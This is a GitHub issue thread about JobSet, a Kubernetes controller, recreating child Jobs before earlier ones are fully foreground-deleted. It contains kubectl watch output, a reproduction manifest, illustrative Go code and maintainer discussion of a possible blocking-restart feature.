ForegroundDeletion of Jobs is not always enforced before recreation #665

Closed
nstogner opened this issue Aug 26, 2024 · 11 comments

Labels
kind/bug Categorizes issue or PR as related to a bug.

Comments

@nstogner
Contributor

What happened:

I noticed this issue while testing what happens when a failure is triggered in one Job while multiple .replicatedJobs[] are specified.

I observed that the JobSet controller did not wait for all Jobs to be deleted before creating a new one.

k get jobs -w -o custom-columns=NAME:.metadata.name,UID:.metadata.uid,CREATION_TIME:.metadata.creationTimestamp
NAME                            UID                                    CREATION_TIME
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
# NEW workers-0 Job created HERE (notice new UID)
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
# Notice that driver-0 still exists (notice same UID)
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z

What you expected to happen:

I expected all Jobs from a given attempt to be fully deleted with ForegroundDeletion before any new Jobs are recreated.

How to reproduce it (as minimally and precisely as possible):

I used this manifest:

apiVersion: jobset.x-k8s.io/v1alpha2
kind: JobSet
metadata:
  name: coordinator-example
spec:
  # label and annotate jobs and pods with stable network endpoint of the designated
  # coordinator pod:
  # jobset.sigs.k8s.io/coordinator=coordinator-example-driver-0-0.coordinator-example
  failurePolicy:
    maxRestarts: 2 
  coordinator:
    replicatedJob: driver
    jobIndex: 0
    podIndex: 0
  replicatedJobs:
  - name: workers
    template:
      spec:
        parallelism: 4
        completions: 4
        backoffLimit: 0
        template:
          spec:
            containers:
            - name: sleep
              image: busybox
              command: 
                - sh # note: the busybox image provides sh, not bash
              args:
                - "-c"
                - "sleep 500 && exit 1"
  - name: driver
    template:
      spec:
        parallelism: 1
        completions: 1
        backoffLimit: 0
        template:
          spec:
            containers:
            - name: sleep
              image: busybox
              command: 
                - sleep
              args:
                - 100s

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):
Client Version: v1.29.6
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.29.2
  • JobSet version (use git describe --tags --dirty --always): v0.6.0
  • Cloud provider or hardware configuration: kind (with podman)
  • Install tools: kubectl apply
@nstogner added the kind/bug label Aug 26, 2024

@nstogner changed the title from "ForegroundDeletion of Jobs is not enforced upon re-Reconcile()" to "ForegroundDeletion of Jobs is not always enforced before recreation" Aug 26, 2024
@nstogner
Contributor Author

I'm assuming the culprit is a subsequent call to Reconcile() that notices .metadata.deletionTimestamp is already set and skips the blocking call to foreground-delete the given Job:

if targetJob.DeletionTimestamp != nil {

I think the fix would be to just remove this conditional.
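
For illustration, here is a minimal sketch of what a foreground-delete loop with that kind of guard typically looks like in a controller-runtime reconciler. The names (deleteChildJobs, the client variable) are hypothetical and this is not JobSet's actual code; it only shows why skipping Jobs that already carry a deletionTimestamp means no further foreground delete is issued for them:

package example

import (
	"context"

	batchv1 "k8s.io/api/batch/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"sigs.k8s.io/controller-runtime/pkg/client"
)

// deleteChildJobs issues foreground deletes for a set of child Jobs.
func deleteChildJobs(ctx context.Context, c client.Client, jobs []*batchv1.Job) error {
	for _, job := range jobs {
		// The guard under discussion: Jobs that already have a deletionTimestamp
		// are skipped, so no further delete call is made for them on later reconciles.
		if job.DeletionTimestamp != nil {
			continue
		}
		// Foreground propagation keeps the Job object around (with the
		// foregroundDeletion finalizer) until all of its pods are deleted.
		err := c.Delete(ctx, job, client.PropagationPolicy(metav1.DeletePropagationForeground))
		if client.IgnoreNotFound(err) != nil {
			return err
		}
	}
	return nil
}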

@kannon92
Contributor

Hey! Would you be open to creating an e2e test and seeing if your suggestion fixes it?

@kannon92
Contributor

Actually, reading about foreground deletion, it seems that it is not a blocking delete call. It sets a finalizer, and then JobSet would recreate.

So I'm not sure this is a bug, tbh.

Sounds like you want to only recreate the Jobs once they are fully deleted. Jobs can take a long time to be deleted, especially if the pods have graceful termination periods.

I think this is really a feature request.
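
For anyone wanting to observe this: while a Job is being foreground-deleted it remains visible with a deletionTimestamp and the foregroundDeletion finalizer until its pods are gone. A quick way to check (substitute your own Job name; this one is taken from the output above):

kubectl get job coordinator-example-workers-0 -o jsonpath='{.metadata.deletionTimestamp}{"\n"}{.metadata.finalizers}{"\n"}'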

@nstogner
Contributor Author

From the GitHub issue that introduced foreground deletion, it appears that the expected behavior is to block until all Pods are gone (otherwise bad things can happen): #392

@nstogner
Contributor Author

Hey! Would you be open to creating an e2e test and seeing if your suggestion fixes it?

Yes, I should be able to do that

@kannon92
Contributor

kannon92 commented Sep 4, 2024

@ahg-g WDYT of #665 (comment)?

Reading the documentation on ForegroundDeletion, I don't understand how that becomes a blocking delete call.

@ahg-g
Contributor

ahg-g commented Sep 5, 2024

Foreground will keep the child job around with deletionTimestamp set until all its pods are deleted. This will prevent JobSet from creating a replacement for the child job until all the pods are deleted. So this is working as expected.

@nstogner why do you want jobset to wait until all child jobs are deleted before creating their replacements?
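
As a side note, the gating described above is the usual controller idiom: a replacement is only created once a Get for the old object returns NotFound. A minimal sketch of that pattern (hypothetical helper name, not JobSet's actual code):

package example

import (
	"context"

	batchv1 "k8s.io/api/batch/v1"
	apierrors "k8s.io/apimachinery/pkg/api/errors"
	"sigs.k8s.io/controller-runtime/pkg/client"
)

// recreateWhenGone creates the replacement Job only after the previous
// incarnation (and, with foreground deletion, all of its pods) is fully gone.
func recreateWhenGone(ctx context.Context, c client.Client, desired *batchv1.Job) error {
	var existing batchv1.Job
	err := c.Get(ctx, client.ObjectKeyFromObject(desired), &existing)
	switch {
	case err == nil:
		// The old Job still exists (possibly terminating with the
		// foregroundDeletion finalizer); do nothing and requeue later.
		return nil
	case apierrors.IsNotFound(err):
		// The old Job is gone; safe to create the replacement without overlap.
		return c.Create(ctx, desired)
	default:
		return err
	}
}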

@danielvegamyhre
Contributor

I observed that the JobSet controller did not wait for all Jobs to be deleted before creating a new one.

@nstogner this is not the intended behavior - as Abdullah mentioned above, the intended behavior is that each Job will not be recreated until the prior iteration of that Job has been completely cleaned up (all pods and the parent Job object removed from etcd). It doesn't wait for all Jobs to be deleted before recreating any Job.

Closing this for now since there's been no activity for ~1 month; feel free to reopen if you want to continue the discussion.

@thebinaryone1

I am observing overlap of pods between two consecutive restart attempts. A straggler pod from restart attempt N-1 will try to connect to a new incarnation of a pod in restart attempt N.

So I'm pretty sure the cleanup is not happening fully before the new set of Jobs/pods is created.

@ahg-g
Contributor

ahg-g commented Oct 18, 2024

So I'm pretty sure the cleanup is not happening fully before the new set of Jobs/pods is created.

Yes, the intent is not to clean up all jobs before starting to create the replacements. The behavior is to recreate child jobs in parallel to facilitate quick restart.

If we want to block on the recreation until all jobs are deleted, then this is a new FailurePolicy feature; we could call it BlockingRestart.
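
Purely as an illustration of that idea, the API shape might look something like the following. The restartStrategy field and BlockingRestart value are hypothetical names from this discussion, not an existing JobSet API:

spec:
  failurePolicy:
    maxRestarts: 2
    # Hypothetical: wait for all child Jobs (and their pods) to be fully
    # deleted before recreating any of them.
    restartStrategy: BlockingRestart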
